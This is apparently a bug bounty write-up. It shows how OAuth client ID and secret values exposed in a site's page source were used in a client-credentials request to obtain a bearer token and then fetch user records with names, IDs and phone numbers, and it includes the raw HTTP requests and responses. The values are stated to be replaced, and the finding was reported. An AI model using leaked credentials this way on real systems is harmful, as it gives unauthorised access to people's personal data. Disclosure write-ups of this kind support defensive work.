Forging OAuth tokens using discovered client id and client secret

Below is a short story about leaked OAuth client id and client secret which I found in the page source that led to generating foreign tokens.

Recon:

{
"ENV": "prod",
"SERVICE_CLIENT_ID": "mvaxns1234gahnbnjkdfsasdgyjkuigv",
"SERVICE_CLIENT_SECRET": "2a548s56-as84-d8fg-asd5-ahsndksj12sh",
"MARKETO_CLIENT_ID": "safsfads-ascd-vcxd-dsfds-adhdnmajkss",
"MARKETO_CLIENT_SECRET": "nchsjskalionmalkjhyusimnbg12sgdf",
"SERVICE_OAUTH_CLIENT_API_VERSION": "v2"
};
Disclaimer: all values were replaced

What is OAuth?

OAuth is an open-standard authorization protocol or framework that provides applications the ability for “secure designated access.” For example, you can tell Facebook that it’s OK for Instagram to access your profile or post updates to your story without having to give Instagram your Facebook password. This minimizes risk in a major way: In the event, Instagram suffers a breach, your Facebook password remains safe.

Client Credentials Flow:

  1. Your app authenticates with the Auth0 Authorization Server using its Client ID and Client Secret (/oauth/token endpoint).
  2. Your Auth0 Authorization Server validates the Client ID and Client Secret.

3. Your Auth0 Authorization Server responds with an Access Token.

4. Your application can use the Access Token to call an API on behalf of itself.

5. The API responds with the requested data.

Let’s try to use this credentials

Exploit:

There are two methods that you can use to include a token in your calls, as an HTTP header, or as a query string parameter:

I used the HTTP header method.

Authorization: Basic <base64 Client_id:Client_secret>

The Client Credentials grant type is used by clients to obtain an access token outside of the context of a user.

POST /{identity url}/oauth/v1/token HTTP/1.1
Host: site.com
Authorization: Basic ehajnnsmnshjaknsjilkmnshtghjklikjWlOTno6VXdsQSgdhjnsmkjdhfbnnmkjshbnbhahsjkkluyhsghbshjnmkdjhead==
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
grant_type=client_credentialsHTTP/1.1 200 OK
Date: Thu, 05 May 2022 21:15:28 GMT
Content-Type: application/json
Content-Length: 1008
Connection: close
Cache-Control: no-cache, no-store, no-transform
{"token_type":"bearer","access_token":"eyJ0[…redacted…]"}

I got back a JWT token.

We can use it to get some data like this

POST /api/v1/users HTTP/1.1
Host: site.com
Authorization: Bearer eyJ0[…redacted…]
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 200 OK
[...]
{
"username":”Name”,
"id":"BLALALALA",
"phone":"21254488"
{
"username":”Name”,
"id":"BLALALALA",
"phone":"21254488"

}

I reported the vulnerability, and they accepted it as a high :).

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Basyouni

Cyber Security Engineer & Penetration Tester | Bug Bounty Hunter